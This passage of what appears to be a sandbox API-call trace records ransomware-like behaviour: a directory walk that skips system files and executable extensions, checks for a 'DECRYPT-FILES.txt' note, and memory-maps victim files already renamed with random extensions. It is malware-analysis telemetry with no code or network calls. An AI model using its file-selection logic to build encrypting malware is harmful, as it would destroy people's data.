9Aa\\H1MiMyXALwnG6yS6\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.727] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.727] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\*" [0184.727] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2bef0b0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0xf0cec7c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0cec7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0184.727] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.727] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2bef0b0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0xf0cec7c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0cec7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.727] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0cec7c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0cec7c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0cec7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.728] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.728] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.728] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.728] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.728] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.728] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.728] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.728] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.728] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.728] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.728] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.728] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.728] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0184.728] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\0a16c9.tmp" [0184.728] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.728] CloseHandle (hObject=0x0) returned 0 [0184.728] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.729] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb3e2e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadb3e2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadb3e2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.729] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.729] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fffb8c0, ftCreationTime.dwHighDateTime=0x1d4d2c7, ftLastAccessTime.dwLowDateTime=0xf5fe1930, ftLastAccessTime.dwHighDateTime=0x1d4c73d, ftLastWriteTime.dwLowDateTime=0xadb64440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe83c, dwReserved0=0x0, dwReserved1=0x0, cFileName="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", cAlternateFileName="L8U5GZ~1.A9P")) returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="autorun.inf") returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="boot.ini") returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="desktop.ini") returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="ntuser.dat") returned -1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="iconcache.db") returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="bootsect.bak") returned 1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="ntuser.dat.log") returned -1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="thumbs.db") returned -1 [0184.729] lstrcmpiW (lpString1="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ", lpString2="Bootfont.bin") returned 1 [0184.729] lstrlenW (lpString="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ") returned 30 [0184.729] lstrcmpiW (lpString1="A9pDQ", lpString2="lnk") returned -1 [0184.729] lstrcmpiW (lpString1="A9pDQ", lpString2="exe") returned -1 [0184.729] lstrcmpiW (lpString1="A9pDQ", lpString2="sys") returned -1 [0184.729] lstrcmpiW (lpString1="A9pDQ", lpString2="dll") returned -1 [0184.729] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.729] lstrlenW (lpString="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ") returned 30 [0184.729] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0184.729] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="L8u5GZutaYG7tB7HCgdf.flv.A9pDQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv.A9pDQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv.A9pDQ" [0184.729] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv.A9pDQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\l8u5gzutayg7tb7hcgdf.flv.a9pdq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0184.730] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=59452) returned 1 [0184.730] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0184.730] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.731] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.731] CloseHandle (hObject=0x270) returned 1 [0184.731] CloseHandle (hObject=0x26c) returned 1 [0184.731] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.731] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6076f10, ftCreationTime.dwHighDateTime=0x1d4c62c, ftLastAccessTime.dwLowDateTime=0x209898c0, ftLastAccessTime.dwHighDateTime=0x1d4d592, ftLastWriteTime.dwLowDateTime=0xadb8a5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="W6Py.mp4.kWv2Z", cAlternateFileName="W6PYMP~1.KWV")) returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="DECRYPT-FILES.txt") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="autorun.inf") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="boot.ini") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="desktop.ini") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="ntuser.dat") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="iconcache.db") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="bootsect.bak") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="ntuser.dat.log") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="thumbs.db") returned 1 [0184.731] lstrcmpiW (lpString1="W6Py.mp4.kWv2Z", lpString2="Bootfont.bin") returned 1 [0184.731] lstrlenW (lpString="W6Py.mp4.kWv2Z") returned 14 [0184.731] lstrcmpiW (lpString1="kWv2Z", lpString2="lnk") returned -1 [0184.731] lstrcmpiW (lpString1="kWv2Z", lpString2="exe") returned 1 [0184.731] lstrcmpiW (lpString1="kWv2Z", lpString2="sys") returned -1 [0184.731] lstrcmpiW (lpString1="kWv2Z", lpString2="dll") returned 1 [0184.731] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.732] lstrlenW (lpString="W6Py.mp4.kWv2Z") returned 14 [0184.732] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0184.732] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="W6Py.mp4.kWv2Z" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4.kWv2Z") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4.kWv2Z" [0184.732] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4.kWv2Z" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\w6py.mp4.kwv2z"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0184.733] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=17408) returned 1 [0184.733] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0184.733] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.734] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.734] CloseHandle (hObject=0x270) returned 1 [0184.734] CloseHandle (hObject=0x26c) returned 1 [0184.734] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.734] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c227300, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0xf59226f0, ftLastAccessTime.dwHighDateTime=0x1d4c8bc, ftLastWriteTime.dwLowDateTime=0xadbd6860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa670, dwReserved0=0x0, dwReserved1=0x0, cFileName="yMux wkXlE.mp3.zjo0eI", cAlternateFileName="YMUXWK~1.ZJO")) returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="DECRYPT-FILES.txt") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="autorun.inf") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="boot.ini") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="desktop.ini") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="ntuser.dat") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="iconcache.db") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="bootsect.bak") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="ntuser.dat.log") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="thumbs.db") returned 1 [0184.734] lstrcmpiW (lpString1="yMux wkXlE.mp3.zjo0eI", lpString2="Bootfont.bin") returned 1 [0184.734] lstrlenW (lpString="yMux wkXlE.mp3.zjo0eI") returned 21 [0184.734] lstrcmpiW (lpString1="zjo0eI", lpString2="lnk") returned 1 [0184.734] lstrcmpiW (lpString1="zjo0eI", lpString2="exe") returned 1 [0184.734] lstrcmpiW (lpString1="zjo0eI", lpString2="sys") returned 1 [0184.735] lstrcmpiW (lpString1="zjo0eI", lpString2="dll") returned 1 [0184.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.735] lstrlenW (lpString="yMux wkXlE.mp3.zjo0eI") returned 21 [0184.735] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0184.735] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="yMux wkXlE.mp3.zjo0eI" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3.zjo0eI") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3.zjo0eI" [0184.735] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\yMux wkXlE.mp3.zjo0eI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\ymux wkxle.mp3.zjo0ei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0184.736] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=42608) returned 1 [0184.736] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0184.736] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.737] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.737] CloseHandle (hObject=0x270) returned 1 [0184.737] CloseHandle (hObject=0x26c) returned 1 [0184.737] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.737] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c227300, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0xf59226f0, ftLastAccessTime.dwHighDateTime=0x1d4c8bc, ftLastWriteTime.dwLowDateTime=0xadbd6860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa670, dwReserved0=0x0, dwReserved1=0x0, cFileName="yMux wkXlE.mp3.zjo0eI", cAlternateFileName="YMUXWK~1.ZJO")) returned 0 [0184.737] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0184.737] CloseHandle (hObject=0x264) returned 1 [0184.737] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0f77d0, ftCreationTime.dwHighDateTime=0x1d4ce9b, ftLastAccessTime.dwLowDateTime=0xc5d6a90, ftLastAccessTime.dwHighDateTime=0x1d4c9fb, ftLastWriteTime.dwLowDateTime=0xadbfc9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11f8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JnbB69OtwfqlLuE9CNu.png.UZMgvg", cAlternateFileName="JNBB69~1.UZM")) returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="DECRYPT-FILES.txt") returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="autorun.inf") returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="boot.ini") returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="desktop.ini") returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="ntuser.dat") returned -1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="iconcache.db") returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="bootsect.bak") returned 1 [0184.737] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="ntuser.dat.log") returned -1 [0184.738] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="thumbs.db") returned -1 [0184.738] lstrcmpiW (lpString1="JnbB69OtwfqlLuE9CNu.png.UZMgvg", lpString2="Bootfont.bin") returned 1 [0184.738] lstrlenW (lpString="JnbB69OtwfqlLuE9CNu.png.UZMgvg") returned 30 [0184.738] lstrcmpiW (lpString1="UZMgvg", lpString2="lnk") returned 1 [0184.738] lstrcmpiW (lpString1="UZMgvg", lpString2="exe") returned 1 [0184.738] lstrcmpiW (lpString1="UZMgvg", lpString2="sys") returned 1 [0184.738] lstrcmpiW (lpString1="UZMgvg", lpString2="dll") returned 1 [0184.738] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.738] lstrlenW (lpString="JnbB69OtwfqlLuE9CNu.png.UZMgvg") returned 30 [0184.738] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.738] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="JnbB69OtwfqlLuE9CNu.png.UZMgvg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png.UZMgvg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png.UZMgvg" [0184.738] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png.UZMgvg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\jnbb69otwfqllue9cnu.png.uzmgvg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.738] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=73612) returned 1 [0184.738] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.738] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.739] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.739] CloseHandle (hObject=0x268) returned 1 [0184.739] CloseHandle (hObject=0x264) returned 1 [0184.739] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.740] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d3dc7e0, ftCreationTime.dwHighDateTime=0x1d4c92a, ftLastAccessTime.dwLowDateTime=0xadc94f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadc94f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SzbeVm7vdK3sHvH", cAlternateFileName="SZBEVM~1")) returned 1 [0184.740] lstrcmpW (lpString1="SzbeVm7vdK3sHvH", lpString2=".") returned 1 [0184.740] lstrcmpW (lpString1="SzbeVm7vdK3sHvH", lpString2="..") returned 1 [0184.740] lstrcatW (in: lpString1="SzbeVm7vdK3sHvH", lpString2="\\" | out: lpString1="SzbeVm7vdK3sHvH\\") returned="SzbeVm7vdK3sHvH\\" [0184.740] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 